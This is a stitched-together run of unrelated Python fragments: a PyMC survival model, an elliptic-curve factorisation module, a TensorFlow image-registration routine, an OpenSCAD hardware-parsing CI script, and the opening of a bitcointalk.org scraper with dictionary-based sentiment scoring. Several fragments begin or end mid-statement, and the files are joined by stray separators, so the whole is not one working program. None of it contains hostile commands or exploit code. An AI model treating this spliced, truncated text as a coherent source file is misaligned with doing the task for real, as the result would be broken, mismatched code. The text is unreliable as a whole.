loglamb_censored = (beta_prequit + gamma_prequit[participant_idx][censored])*(1-is_post_quit[censored]) + beta_prequit_day*day_within_period[censored]*(1-is_post_quit[censored]) + (beta_postquit + gamma_postquit[participant_idx][censored])*is_post_quit[censored] + beta_postquit_day*day_within_period[censored]*is_post_quit[censored]
lamb_censored = np.exp(loglamb_censored)
Y_hat_censored = pm.Potential('Y_hat_censored', exponential_log_complementary_cdf(x = time_to_next_event[censored], lam = lamb_censored))
#%%
# Sample from posterior distribution
with model:
# posterior_samples = pm.sample(draws=5000, tune=5000, cores=1, target_accept=0.80)
posterior_samples = pm.sample(draws = 3000, tune=2000, init='adapt_diag', cores = 1)
#%%
# Calculate 95% credible interval
model_summary_logscale = az.summary(posterior_samples, credible_interval=.95)
model_summary_logscale = model_summary_logscale[['mean','hpd_2.5%','hpd_97.5%']]
# Produce trace plots
pm.traceplot(posterior_samples)
# Collect results
collect_results['2'] = {'model':model,
'posterior_samples':posterior_samples,
'model_summary_logscale':model_summary_logscale}
#%%
# Remove variable from workspace
del model, posterior_samples, model_summary_logscale
#%%
###############################################################################
# Print results from all models
###############################################################################
import matplotlib.pyplot as plt
# Model 0
pm.traceplot(collect_results['0']['posterior_samples'])
print(collect_results['0']['model_summary_logscale'])
plt.figure(figsize=(4,8))
pm.forestplot(collect_results['0']['posterior_samples'], var_names=['beta'], credible_interval=0.95)
pm.forestplot(collect_results['0']['posterior_samples'], var_names=['beta_day'], credible_interval=0.95)
#pm.forestplot(collect_results['0']['posterior_samples'], var_names=['alpha'], credible_interval=0.95)
# Model 1
pm.traceplot(collect_results['1']['posterior_samples'])
print(collect_results['1']['model_summary_logscale'])
plt.figure(figsize=(4,8))
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_prequit'], credible_interval=0.95)
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_prequit_day'], credible_interval=0.95)
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_postquit'], credible_interval=0.95)
pm.forestplot(collect_results['1']['posterior_samples'], var_names=['beta_postquit_day'], credible_interval=0.95)
#pm.forestplot(collect_results['1']['posterior_samples'], var_names=['alpha'], credible_interval=0.95)
# Model 2
pm.traceplot(collect_results['2']['posterior_samples'])
print(collect_results['2']['model_summary_logscale'])
plt.figure(figsize=(4,8))
pm.forestplot(collect_results['2']['posterior_samples'], var_names=['beta_prequit'], | |
<gh_stars>0
"""Elliptic Curve Method using Montgomery Curves.
"""
import random
import time
from math import gcd
import numpy as np
from wheel_sieve.common import (
PRIME_GEN,
InverseNotFound,
CurveInitFail,
inv,
init_wheel,
)
def get_curve_suyama(sigma, n):
"""Given parameter sigma, generate an Elliptic Curve (mod n) and a point on it using
Suyama's parametrization.
The constructed curve's group order is a multiple of 12, compared to 4 guaranteed for
Montgomery Curves.
Args:
sigma (int): The sigma parameter.
n (int): Modulus.
Raises:
CurveInitFail: Thrown when the curve generated by the given parameters fails the
necessary conditions.
Returns:
tuple(tuple(int, int), tuple(int, int, int)): (Point, Curve), where
- Point = (x0, z0) in projective coordinates ignoring y.
- Curve = (A, s, n),
representing B * (y/z) ** 2 == (x/z) ** 3 + A * (x/z) ** 2 + (x/z) (mod n),
ignoring B and y.
- s = (A+2)/4 % n is precomputed for point doubling.
"""
if sigma % n in (n - 5, n - 3, n - 1, 0, 1, 3, 5) or sigma * 3 % n in (n - 5, 5):
raise CurveInitFail()
u = sigma ** 2 - 5 % n
v = 4 * sigma % n
x0 = u ** 3 % n
z0 = v ** 3 % n
A = ((v - u) ** 3 * (3 * u + v) * inv(4 * u ** 3 * v, n) - 2) % n
if A in (n - 2, 2):
raise CurveInitFail()
s = (A + 2) * inv(4, n) % n
# For completeness...
# B = u * inv(z0, n) % n
# y = (sigma ** 2 - 1) * (sigma ** 2 - 25) * (sigma ** 4 - 25) % n
# x0_norm = (x0 * inv(z0, n)) % n
# y0_norm = (y * inv(z0, n)) % n
# assert B * y0_norm ** 2 % n == (x0_norm ** 3 + A * x0_norm ** 2 + x0_norm) % n
return (x0, z0), (A, s, n)
def get_curve_a(x, A, n):
"""Given parameters x and A, generate an Elliptic Curve (mod n) and a point on it.
Args:
x (int): Desired x coordinate of the point.
A (int): Parameter A of Montgomery Curve.
n (int): Modulus.
Raises:
CurveInitFail: Thrown when the curve generated by the given parameters fails the
necessary conditions.
Returns:
tuple(tuple(int, int), tuple(int, int, int)): (Point, Curve), where
- Point = (x0, z0) in projective coordinates ignoring y.
- Curve = (A, s, n),
representing B * (y/z) ** 2 == (x/z) ** 3 + A * (x/z) ** 2 + (x/z) (mod n),
ignoring B and y.
- s = (A+2)/4 % n is precomputed for point doubling.
"""
if A % n in (n - 2, 2):
raise CurveInitFail()
x0 = x % n
z0 = 1
s = (A + 2) * inv(4, n) % n
# For completeness...
# x0_norm = x0
# y0_norm = 2
# B = (x0_norm ** 3 + A * x0_norm ** 2 + x0_norm) * inv(y0_norm ** 2, n) % n
# assert B * y0_norm ** 2 % n == (x0_norm ** 3 + A * x0_norm ** 2 + x0_norm) % n
return (x0, z0), (A, s, n)
def add_pt(ptp, ptq, pt_, curve):
"""Computes point P+Q given points P, Q and P-Q, and curve.
Does not return correct result when P == Q, use dbl_pt instead.
Args:
ptp (tuple(int, int)): Point P.
ptq (tuple(int, int)): Point Q.
pt_ (tuple(int, int)): Point P-Q.
curve (tuple(int, int, int)): Curve.
Returns:
tuple(int, int): Point P+Q.
"""
xp, zp = ptp
xq, zq = ptq
x_, z_ = pt_
_A, _s, n = curve
u = (xp - zp) * (xq + zq) % n
v = (xp + zp) * (xq - zq) % n
xr = z_ * ((u + v) ** 2 % n) % n
zr = x_ * ((u - v) ** 2 % n) % n
return (xr, zr)
def to_weierstrass(pt, curve):
"""Given a point P and an Montgomery Curve it is on, computes the equivalent point and curve
in weierstrass form.
Note: Multiple calls for same curve with different P will produce different output curves.
This is due to y-coordinates being omitted in the representation. Without the ability to
square-root y (mod n) by fixing B, the natural thing to do is to fix y and calculate B.
So different point P produces different B.
Args:
pt (tuple(int, int)): Point P in XZ form.
curve (tuple(int, int, int)): Curve in Montgomery form.
Returns:
tuple(tuple(int, int), tuple(int, int, int)): (Point, Curve), where
- Point = (t, v) in XY form.
- Curve = (a, b, n) representing the Elliptic Curve y**2 = x**3 + a*x + b (mod n).
"""
x, z = pt
A, _s, n = curve
y_norm = 1
x_norm = x * inv(z, n)
B = (x_norm ** 3 + A * x_norm ** 2 + x_norm) % n
assert B * y_norm ** 2 % n == (x_norm ** 3 + A * x_norm ** 2 + x_norm) % n
B_inv = inv(B, n)
three_inv = inv(3, n)
t = (x_norm * B_inv + A * three_inv * B_inv) % n
v = (y_norm * B_inv) % n
a = (3 - A ** 2) * three_inv * B_inv * B_inv % n
b = (2 * A ** 3 - 9 * A) * (three_inv * B_inv % n) ** 3 % n
assert v ** 2 % n == (t ** 3 + a * t + b) % n
return (t, v), (a, b, n)
def add_pt_exn(ptp, ptq, pt_, curve):
"""Computes point P+Q given points P, Q and P-Q, and curve.
Does not return correct result when P == Q, use dbl_pt instead.
Args:
ptp (tuple(int, int)): Point P.
ptq (tuple(int, int)): Point Q.
pt_ (tuple(int, int)): Point P-Q.
curve (tuple(int, int, int)): Curve.
Raises:
InverseNotFound: Thrown when point P+Q is the point at infinity.
Returns:
tuple(int, int): Point P+Q.
"""
return check(add_pt(ptp, ptq, pt_, curve), curve)
def dbl_pt(pt, curve):
"""Computes point 2P given point P and curve.
Args:
pt (tuple(int, int)): Point P.
curve (tuple(int, int, int)): Curve.
Returns:
tuple(int, int): Point 2P.
"""
x, z = pt
_A, s, n = curve
a = (x + z) ** 2 % n
b = (x - z) ** 2 % n
t = a - b
xr = a * b % n
zr = t * ((b + s * t) % n) % n
return (xr, zr)
def mul_pt_exn(pt, curve, k):
"""Computes point kP given point P, curve and k using Montgomery Ladder.
Args:
pt (tuple(int, int)): Point P.
curve (tuple(int, int, int)): Curve.
k (int): Multiplier.
Raises:
InverseNotFound: Thrown when point kP is the point at infinity.
Returns:
tuple(int, int): Point kP.
"""
if k <= 2:
if k < 0:
# x and z coordinates are the same for P and -P.
return mul_pt_exn(pt, curve, -k)
if k == 0:
# InverseNotFound will be thrown
return check((0, 0), curve)
if k == 1:
return check(pt, curve)
return check(dbl_pt(pt, curve), curve)
res0 = pt
res1 = dbl_pt(pt, curve)
j = k.bit_length() - 2
while j >= 1:
if (k >> j) % 2 == 1:
res0 = add_pt(res1, res0, pt, curve)
res1 = dbl_pt(res1, curve)
else:
res1 = add_pt(res1, res0, pt, curve)
res0 = dbl_pt(res0, curve)
j -= 1
if k % 2 == 1:
res0 = add_pt(res1, res0, pt, curve)
else:
res0 = dbl_pt(res0, curve)
return check(res0, curve)
def check(pt, curve):
"""Given point P (x, z), check that P is not the point at infinity, i.e. gcd(z, n) == 1,
and return P.
Args:
pt (tuple(int, int)): Point P.
curve (tuple(int, int, int)): Curve.
Raises:
| |
tf.convert_to_tensor(params['A0'], dtype=dtype)
# cost function parameters
sigmaM = params['sigmaM'] # matching
sigmaM2 = sigmaM**2
sigmaR = params['sigmaR'] # regularization
sigmaR2 = sigmaR**2
sigmaA = params['sigmaA'] # artifact
sigmaA2 = sigmaA**2
# optimization parameters
niter = params['niter'] # gradient descent iterations
naffine = params['naffine'] # gradient descent iterations of affinen only
if nt == 0: # only do affine
naffine = niter+1
nMstep = params['nMstep'] # number of M steps per E step in EM algorithm for artifacts
nMstep_affine = params['nMstep_affine'] # number of M steps per E step in EM algorithm for artifacts during affine only phase
eV = params['eV'] # step size for deformation parameters
eL = params['eL'] # step size for linear part of affine
eT = params['eT'] # step size for translation part of affine
post_affine_reduce = params['post_affine_reduce'] # reduce affine step sizes by this much once nonrigid starts
# Get initial guess for deformation and resample if necessary
# initial velocity, I need the nT in order to do this
params['vt00'] = np.zeros((I.shape[0],I.shape[1],I.shape[2],nt),dtype=np.float32)
params['vt10'] = np.zeros((I.shape[0],I.shape[1],I.shape[2],nt),dtype=np.float32)
params['vt20'] = np.zeros((I.shape[0],I.shape[1],I.shape[2],nt),dtype=np.float32)
params.update(kwargs)
vt00 = params['vt00'].astype(np.float32)
vt10 = params['vt10'].astype(np.float32)
vt20 = params['vt20'].astype(np.float32)
nt_check = vt00.shape[-1]
if nt_check != nt:
raise ValueError('input velocity field should be the same number of timesteps as nt parameter')
n0_check = vt00.shape[0]
n1_check = vt00.shape[1]
n2_check = vt00.shape[2]
if n0_check != nxI[0] or n1_check != nxI[1] or n2_check != nxI[2]:
warnings.warn('upsampling initial guess of velocity field')
shape = np.array([I.shape[0],I.shape[1],I.shape[2],nt])
vt00_ = vt00
vt10_ = vt10
vt20_ = vt20
vt00 = np.zeros(shape)
vt10 = np.zeros(shape)
vt20 = np.zeros(shape)
for t in range(nt):
print('Upsampling velocity time {} of {}'.format(t,nt))
vt00[:,:,:,t] = upsample(vt00_[:,:,:,t],shape[:3])
vt10[:,:,:,t] = upsample(vt10_[:,:,:,t],shape[:3])
vt20[:,:,:,t] = upsample(vt20_[:,:,:,t],shape[:3])
vt00 = vt00.astype(np.float32)
vt10 = vt10.astype(np.float32)
vt20 = vt20.astype(np.float32)
# gradient descent step sizes set as placeholders
eV_ph = tf.placeholder(dtype=dtype)
eL_ph = tf.placeholder(dtype=dtype)
eT_ph = tf.placeholder(dtype=dtype)
if verbose: print('Got parameters')
################################################################################
# some initializations
CA = params['CA0'] # constant value for "artifact image"
I = tf.convert_to_tensor(I, dtype=dtype)
J = tf.convert_to_tensor(J, dtype=dtype)
W = tf.convert_to_tensor(params['W'], dtype=dtype)
# build kernels for enforcing smoothness
f0I = np.arange(nxI[0])/dxI[0]/nxI[0]
f1I = np.arange(nxI[1])/dxI[1]/nxI[1]
f2I = np.arange(nxI[2])/dxI[2]/nxI[2]
F0I,F1I,F2I = np.meshgrid(f0I, f1I, f2I, indexing='ij')
# identity minus laplacian, in fourier domain
# AI[i,j] = I[i,j] - alpha^2( (I[i+1,j] - 2I[i,j] + I[i-1,j])/dx^2 + (I[i,j+1] - 2I[i,j] + I[i,j-1])/dy^2 )
Lhat = (1.0 - a**2*( (-2.0 + 2.0*np.cos(2.0*np.pi*dxI[0]*F0I))/dxI[0]**2
+ (-2.0 + 2.0*np.cos(2.0*np.pi*dxI[1]*F1I))/dxI[1]**2
+ (-2.0 + 2.0*np.cos(2.0*np.pi*dxI[2]*F2I))/dxI[2]**2 ) )**p
LLhat = Lhat**2
Khat = 1.0/LLhat
K = np.real(np.fft.ifftn(Khat))
Khattf = tf.complex(tf.constant(Khat,dtype=dtype),tf.zeros((1),dtype=dtype)) # this should be complex because it multiplies other complex things to do smoothing
LLhattf = tf.constant(LLhat,dtype=dtype) # this should be real because it multiplies real things to compute energy
f = plt.figure()
vis.imshow_slices(np.fft.ifftshift(K),x=xI,fig=f)
f.suptitle('Smoothing kernel')
f.canvas.draw()
if verbose: print('Built energy operators')
# initialize tensorflow variables that will be optimized
# we need an "old" and a "new" version for our iterative algorithm
with tf.variable_scope("", reuse=tf.AUTO_REUSE):
A = tf.get_variable('A', dtype=dtype, trainable=False, initializer=A0)
Anew = tf.get_variable('Anew', dtype=dtype, trainable=False, initializer=A0)
vt0 = tf.get_variable('vt0', dtype=dtype, trainable=False, initializer=vt00)
vt1 = tf.get_variable('vt1', dtype=dtype, trainable=False, initializer=vt10)
vt2 = tf.get_variable('vt2', dtype=dtype, trainable=False, initializer=vt20)
vt0new = tf.get_variable('vt0new', dtype=dtype, trainable=False, initializer=vt00)
vt1new = tf.get_variable('vt1new', dtype=dtype, trainable=False, initializer=vt10)
vt2new = tf.get_variable('vt2new', dtype=dtype, trainable=False, initializer=vt20)
# build initial weights WM (matching) and WA (artifact)
# if not using weights just use 1 and 0
npones = np.ones(nxJ)
if nMstep>0:
WM0 = tf.convert_to_tensor(npones*0.9, dtype=dtype)
WA0 = tf.convert_to_tensor(npones*0.1, dtype=dtype)
else:
WM0 = tf.convert_to_tensor(npones, dtype=dtype)
WA0 = tf.convert_to_tensor(npones*0.0, dtype=dtype)
WM = tf.get_variable('WM', dtype=dtype, trainable=False, initializer=WM0)
WA = tf.get_variable('WA', dtype=dtype, trainable=False, initializer=WA0)
WMnew = tf.get_variable('WMnew', dtype=dtype, trainable=False, initializer=WM0)
WAnew = tf.get_variable('WAnew', dtype=dtype, trainable=False, initializer=WA0)
if verbose: print('Built tensorflow variables')
################################################################
# define gradient calculations and updates in tensorflow graph
# initialize time dependent flow
It = [I]
phiinv0 = tf.convert_to_tensor(X0I, dtype=dtype) # make sure these are tensors
phiinv1 = tf.convert_to_tensor(X1I, dtype=dtype)
phiinv2 = tf.convert_to_tensor(X2I, dtype=dtype)
ERt = []
for t in range(nt):
# slice the velocity for convenience
v0 = vt0[:,:,:,t]
v1 = vt1[:,:,:,t]
v2 = vt2[:,:,:,t]
# points to sample at for updating diffeomorphisms
X0s = X0I - v0*dt
X1s = X1I - v1*dt
X2s = X2I - v2*dt
# update diffeomorphism with nice boundary conditions
phiinv0 = interp3(x0I, x1I, x2I, phiinv0-X0I, X0s, X1s, X2s) + X0s
phiinv1 = interp3(x0I, x1I, x2I, phiinv1-X1I, X0s, X1s, X2s) + X1s
phiinv2 = interp3(x0I, x1I, x2I, phiinv2-X2I, X0s, X1s, X2s) + X2s
# deform the image, I will need this for image gradient computations
It.append(interp3(x0I, x1I, x2I, I, phiinv0, phiinv1, phiinv2))
# take the Fourier transform, for computing energy directly in Fourier domain
# note the normalizer 1/(number of elements)
v0hat = tf.fft3d(tf.complex(v0, 0.0))
v1hat = tf.fft3d(tf.complex(v1, 0.0))
v2hat = tf.fft3d(tf.complex(v2, 0.0))
# I changed this to reduce mean and float64 to improve numerical precision
ER_ = tf.reduce_mean(tf.cast( ( tf.pow(tf.abs(v0hat),2)
+ tf.pow(tf.abs(v1hat),2)
+ tf.pow(tf.abs(v2hat),2) ) * LLhattf , dtype=tf.float64) )
ERt.append(ER_)
# now apply affine tranform
B = tf.linalg.inv(A)
X0s = B[0,0]*X0J + B[0,1]*X1J + B[0,2]*X2J + B[0,3]
X1s = B[1,0]*X0J + B[1,1]*X1J + B[1,2]*X2J + B[1,3]
X2s = B[2,0]*X0J + B[2,1]*X1J + B[2,2]*X2J + B[2,3]
phiinvB0 = interp3(x0I, x1I, x2I, phiinv0 - X0I, X0s, X1s, X2s) + X0s
phiinvB1 = interp3(x0I, x1I, x2I, phiinv1 - X1I, X0s, X1s, X2s) + X1s
phiinvB2 = interp3(x0I, x1I, x2I, phiinv2 - X2I, X0s, X1s, X2s) + X2s
AphiI = interp3(x0I, x1I, x2I, I, phiinvB0, phiinvB1, phiinvB2)
################################################################################
# Calculate posterior probability weights that each pxiel is an artifact or real data
WMsum = tf.reduce_sum(WM*W)
WMW = WM*W
WAW = WA*W
CA = tf.reduce_sum(J*WAW)/(tf.reduce_sum(WAW)+1.0e-6) # avoid divide by zero possibility
################################################################################
# build polynomial contrast transform
Is = tf.reshape(AphiI,[-1])
Js = tf.reshape(J,[-1])
WMWs = tf.reshape(WMW,[-1])
Basis = tf.stack( [Is**o for o in range(order+1)] ) # size O x N (order+1 by number of voxels)
# Basis times J (size Ox1)
BTJ = tf.reduce_mean(Basis * Js[None]*WMWs[None], axis=1)
# get basis times basis (size OxO)
BTB = tf.reduce_mean( Basis[:,None,:] * Basis[None,:,:] * WMWs[None,None], axis=2 )
coeffs = tf.matrix_solve(BTB,BTJ[:,None])
fAphiI = tf.zeros_like(Js)
for o in range(order+1):
fAphiI += (Is**o)*coeffs[o]
fAphiI = tf.reshape(fAphiI,nxJ)
################################################################################
# now we can update weights, this is the E step of the EM algorithm
WMnew = tf.exp( tf.pow(fAphiI - J, 2) * (-0.5/sigmaM2 ) ) * 1.0/np.sqrt(2.0*np.pi*sigmaM2)
WAnew = tf.exp( tf.pow(CA - J, 2) * (-0.5/sigmaA2 ) ) * 1.0/np.sqrt(2.0*np.pi*sigmaA2)
Wsum = WMnew + WAnew
Wsum = Wsum + tf.reduce_max(Wsum)*1e-6
WMnew = WMnew / Wsum
WAnew = WAnew / Wsum
################################################################################
# get the energy of the flow and the sum of square error matching energy
if nt > 0:
ER = tf.reduce_sum(tf.stack(ERt))
else:
ER = tf.convert_to_tensor(0.0,dtype=tf.float64)
ER *= dt*dxI[0]*dxI[1]*dxI[2]/sigmaR2/2.0
# typically I would also divide by nx, but since I'm using reduce mean instead of reduce sum when summing over space, I do not
EM = tf.reduce_sum( tf.cast( tf.pow(fAphiI - J, 2)*WM*W, dtype=tf.float64) )/sigmaM2*dxI[0]*dxI[1]*dxI[2]/2.0
# artifact
EA = tf.reduce_sum( tf.cast( tf.pow(CA - J, 2)*WA*W, dtype=tf.float64) )/sigmaA2*dxI[0]*dxI[1]*dxI[2]/2.0
# let's just use these two for now
E = EM + ER
################################################################################
# now we compute the gradient with respect to affine transform parameters
# this is for right perturbations using matrix exponential parameterization
# i.e. A \mapsto A expm( e dA)
lambda1 = -WM*W*(fAphiI - J)/sigmaM2
fAphiI_0, fAphiI_1, fAphiI_2 = grad3(fAphiI, dxJ)
gradAcol = []
for r in range(3):
gradArow = []
for c in range(4):
#dA = tf.zeros(4)
#dA[r,c] = 1.0 # tensorflow does not support this kind of assignment
dA = np.zeros((4,4))
dA[r,c] = 1.0
AdAB = tf.matmul(tf.matmul(A, tf.convert_to_tensor(dA, dtype=dtype)), B)
AdAB0 = AdAB[0,0]*X0J + AdAB[0,1]*X1J + AdAB[0,2]*X2J + | |
<filename>hardware/ci/parse.py<gh_stars>0
#!/usr/bin/env python
# Parse json from machine files, build hardware.json
import os
import shutil
import sys
import re
import json
import jsontools
import openscad
import syntax
from types import *
def parse_machines():
src_dir = '../'
logfile = 'openscad.log'
outfile = 'hardware.json'
oldfile = 'backup.json'
errorfile = 'invalid.json'
errorlevel = 0
print("Parse")
print("-----")
# load backup.json - to read cache values
oldjso = None
if os.path.isfile(oldfile):
jf = open(oldfile,"r")
oldjso = json.load(jf)
jf.close()
print("Looking for machine files...")
# reset error file
if os.path.isfile(errorfile):
os.remove(errorfile)
js = '[\n'
files = 0
for filename in os.listdir(src_dir):
if filename[-5:] == '.scad':
print(" Parsing: "+filename)
scadfile = src_dir + filename
if (files > 0):
js += ', '
s = ''
syn = syntax.check_syntax(scadfile,0)
if syn['errorLevel'] > 0:
errorlevel = syn['errorLevel']
else:
try:
s = parse_machine(scadfile, logfile, errorfile)
except:
errorlevel = 1
if (s > ''):
js += s
files += 1
js += ']';
# get rid of trailing commas
js = re.sub(r",(\s*(\}|\]))","\g<1>", js, re.M)
# parse
if errorlevel == 0:
try:
jso = json.loads(js)
print(" Parsed "+str(files)+" machine files")
summarise_files(jso, oldjso)
summarise_parts(jso, oldjso)
update_cache_info(jso, oldjso)
# prettify
js = json.dumps(jso, sort_keys=False, indent=4, separators=(',', ': '))
except Exception as e:
print(e)
errorlevel = 1
with open(outfile, 'w') as f:
f.write(js)
print("")
return errorlevel
def parse_machine(scadfile, logfile, errorfile):
openscad.run('-D','$ShowBOM=true','-o','dummy.csg',scadfile);
js = ''
errorlevel = 0
for line in open(logfile, "rt").readlines():
# errors
r = re.search(r".*syntax error$", line, re.I)
if r:
print(" Syntax error!")
print(line)
errorlevel = 2
continue
# echo lines
r = re.search(r'^.*ECHO\:\s\"(.*)\"$', line, re.I)
if r:
s = r.group(1)
# rewrite single quotes to double quotes, except for where they are used in words, e.g. isn't
s = re.sub(r"((\w)['](\W|$))","\g<2>\"\g<3>", s)
s = re.sub(r"((\W|^)['](\w))","\g<2>\"\g<3>", s)
s = re.sub(r"((\W)['](\W))","\g<2>\"\g<3>", s)
js += s + '\n'
if errorlevel == 0:
# Get rid of any empty objects
js = js.replace("{}","")
# get rid of trailing commas
js = re.sub(r",(\s*(\}|\]))","\g<1>", js)
js = re.sub(r",\s*$","", js)
try:
jso = json.loads(js)
# prettify
js = json.dumps(jso, sort_keys=False, indent=4, separators=(',', ': '))
except Exception as e:
print(e)
print("See "+errorfile+" for malformed json")
with open(errorfile, 'w') as f:
f.write(js)
# Stop malformed machine json screwing up everything else!
js = ''
else:
raise Exception("Syntax error")
return js
# File Summarisation
# ------------------
def in_files(fn, fs):
for f in fs:
if f['type'] == 'file' and f['file'] == fn:
return True
return False
def add_file(fn, fs):
if not in_files(fn, fs):
fs.append({ 'type':'file', 'file':fn })
def add_file_for(jso, fs):
if type(jso) is DictType:
if 'file' in jso:
add_file(jso['file'], fs)
if 'children' in jso:
for c in jso['children']:
add_file_for(c, fs)
def summarise_files(jso, oldjso):
print("Summarising files for all machines...")
fl = { 'type':'filelist', 'files':[] }
jso.append(fl)
fs = fl['files']
for m in jso:
add_file_for(m, fs)
print(" Found "+str(len(fs))+" files")
# Part Summarisation
# ------------------
def add_view(jso, o):
vfound = None
for v in o['views']:
if v['title'] == jso['title']:
vfound = v
continue
if vfound == None:
vfound = o['views'].append(jso)
def add_views_for(jso, o):
# check for views in children
for c in jso['children']:
if type(c) is DictType and c['type'] == 'view':
add_view(c, o)
def add_part(jso, o):
vfound = None
for v in o['parts']:
if v['title'] == jso['title']:
vfound = v
continue
if vfound == None:
vfound = o['parts'].append(jso)
def add_parts_for(jso, o):
# check for parts in children
for c in jso['children']:
if type(c) is DictType and c['type'] == 'part':
add_part(c, o)
def add_step(jso, o):
vfound = None
for v in o['steps']:
if v['num'] == jso['num']:
vfound = v
continue
if vfound == None:
vfound = {'num':jso['num'], 'desc':jso['desc'], 'views':[] }
o['steps'].append(vfound)
add_views_for(jso, vfound)
def add_steps_for(jso, o):
# check for steps in children
for c in jso['children']:
if type(c) is DictType and c['type'] == 'step':
add_step(c, o)
def add_vitamin(jso, vl, addViews=True, addParts=True):
#print(" Vitamin: "+jso['title'])
vfound = None
for v in vl:
if v['title'] == jso['title']:
vfound = v
continue
if vfound:
vfound['qty'] += 1
else:
vfound = { 'title':jso['title'], 'call':jso['call'], 'file':jso['file'], 'qty':1, 'views':[], 'parts':[] }
vl.append(vfound)
if addViews:
add_views_for(jso, vfound)
if addParts:
add_parts_for(jso, vfound)
def add_printed(jso, pl, addViews=True):
#print(" Printed Part: "+jso['title'])
pfound = None
for p in pl:
if p['title'] == jso['title']:
pfound = p
continue
if pfound:
pfound['qty'] += 1
else:
pfound = { 'title':jso['title'], 'call':jso['call'], 'file':jso['file'], 'qty':1, 'views':[] }
pl.append(pfound)
if addViews:
add_views_for(jso, pfound)
def add_cut(jso, cl, addSteps=True, addViews=True, addChildren=True):
afound = None
for a in cl:
if a['title'] == jso['title']:
afound = a
continue
if afound:
afound['qty'] += 1
else:
afound = {
'title':jso['title'], 'call':jso['call'], 'file':jso['file'],
'completeCall':jso['completeCall'],
'qty':1, 'views':[], 'steps':[], 'vitamins':[]
}
cl.append(afound)
if addViews:
add_views_for(jso, afound)
if addSteps:
add_steps_for(jso, afound)
nvl = afound['vitamins'];
# Collate immediate children, and sub-assemblies nested in steps!
if addChildren and 'children' in jso:
for c in jso['children']:
if type(c) is DictType:
tn = c['type']
if tn == 'vitamin':
add_vitamin(c, nvl, addViews=False)
if tn == 'step':
for sc in c['children']:
if type(sc) is DictType:
tn2 = sc['type']
if tn2 == 'vitamin':
add_vitamin(sc, nvl, addViews=False)
def add_assembly(jso, al, pl, vl, cl, addSteps=True, addViews=True, addChildren=True, level=0):
#print(" Assembly: "+jso['title'])
#print(" Level: "+str(level))
afound = None
for a in al:
if a['title'] == jso['title']:
afound = a
continue
if afound:
afound['level'] = max(afound['level'], level)
afound['qty'] += 1
else:
afound = {
'title':jso['title'], 'call':jso['call'], 'file':jso['file'], 'level':level,
'qty':1, 'views':[], 'steps':[], 'assemblies':[], 'vitamins':[], 'printed':[], 'cut':[]
}
al.append(afound)
if addViews:
add_views_for(jso, afound)
if addSteps:
add_steps_for(jso, afound)
nvl = afound['vitamins'];
nal = afound['assemblies'];
npl = afound['printed'];
ncl = afound['cut'];
# Collate immediate children, and sub-assemblies nested in steps!
nextlevel = level + 1
if addChildren and 'children' in jso:
for c in jso['children']:
if type(c) is DictType:
tn = c['type']
if tn == 'vitamin':
add_vitamin(c, nvl, addViews=False)
if tn == 'assembly':
add_assembly(c, nal, npl, nvl, ncl, addSteps=False, addViews=False, addChildren=False, level=nextlevel)
if tn == 'cut':
add_cut(c, ncl, addViews=False, addSteps=False, addChildren=False)
if tn == 'printed':
add_printed(c, npl, addViews=False)
if tn == 'step':
for sc in c['children']:
if type(sc) is DictType:
tn2 = sc['type']
if tn2 == 'vitamin':
add_vitamin(sc, nvl, addViews=False)
if tn2 == 'assembly':
add_assembly(sc, nal, npl, nvl, ncl, addSteps=False, addViews=False, addChildren=False, level=nextlevel)
if tn2 == 'printed':
add_printed(sc, npl, addViews=False)
if tn == 'cut':
add_cut(c, ncl, addViews=False, addSteps=False, addChildren=False)
def summarise_parts_for(jso, al, pl, vl, cl, level=0):
# print("sum_parts_for "+str(level))
if type(jso) is DictType:
tn = jso['type']
if tn == 'vitamin':
add_vitamin(jso, vl)
if tn == 'assembly':
add_assembly(jso, al, pl, vl, cl, level=level)
if tn == 'cut':
add_cut(jso, cl)
if tn == 'printed':
add_printed(jso, pl)
if 'children' in jso:
for c in jso['children']:
summarise_parts_for(c, al, pl, vl, cl, level+1)
def summarise_parts(jso, oldjso):
print("Summarising parts for each machine...")
for m in jso:
if type(m) is DictType and m['type'] == 'machine':
print(" "+m['title']+"...")
al = m['assemblies'] = []
cl = m['cut'] = []
pl = m['printed'] = []
vl = m['vitamins'] = []
for c in m['children']:
summarise_parts_for(c, al, pl, vl, cl, 0)
print(" Found:")
print(" "+str(len(al))+" assemblies")
print(" "+str(len(cl))+" cut parts")
print(" "+str(len(pl))+" printed parts")
print(" "+str(len(vl))+" vitamins")
# Update Cache
# ------------
def update_cache_info_for(vl, ovl):
if vl == None or ovl == None:
return
for v in vl:
if type(v) is DictType and 'title' in v:
print(" "+v['title'])
# find match in ovl
oldv = None
for ov in ovl:
if type(ov) is DictType and 'title' in ov and ov['title'] == v['title']:
oldv = ov
continue
if oldv:
# merge json info
jsontools.json_merge_missing_keys(v, oldv)
| |
""" Module for requesting data from bitcointalk.org and parsing it. """
import codecs
from datetime import date
from datetime import datetime
from datetime import time as tm
import HTMLParser
import json
import logging
import lxml.html
import requests
import os
from random import random
import re
import sys
import time
import unittest
import nltk
import pandas
baseUrl = "https://bitcointalk.org/index.php"
countRequested = 0
interReqTime = 2
lastReqTime = None
nltk.download('stopwords')
sr = nltk.corpus.stopwords.words('english')
lmdict = pandas.read_excel(os.path.join(os.getcwd(), 'LoughranMcDonald_MasterDictionary_2014.xlsx'))
neg_words = lmdict.loc[lmdict.Negative != 0, 'Word'].str.lower().unique()
pos_words = lmdict.loc[lmdict.Positive != 0, 'Word'].str.lower().unique()
def computeSentiment(text):
# Tokenize and remove stop words
tokens = []
for t in nltk.regexp_tokenize(text.lower(), '[a-z]+'):
if t not in sr:
tokens.append(t)
tokens[:10]
# Count the number of positive and negative words.
pos_count = 0
neg_count = 0
for t in tokens:
if t in pos_words:
pos_count += 1
elif t in neg_words:
neg_count += 1
# Compute sentiment
if (pos_count + neg_count) > 0:
sentiment = float(pos_count - neg_count)/float(pos_count + neg_count)
else:
sentiment = 0
return sentiment
def _request(payloadString):
"""Private method for requesting an arbitrary query string."""
global countRequested
global lastReqTime
if lastReqTime is not None and time.time() - lastReqTime < interReqTime:
timeToSleep = random()*(interReqTime-time.time()+lastReqTime)*2
logging.info("Sleeping for {0} seconds before request.".format(
timeToSleep))
time.sleep(timeToSleep)
logging.info("Issuing request for the following payload: {0}".format(
payloadString))
r = {}
for i in range(0, 20):
try:
r = requests.get("{0}?{1}".format(baseUrl, payloadString))
break
except Exception as e:
if i == 19:
raise e
time.sleep(1)
continue
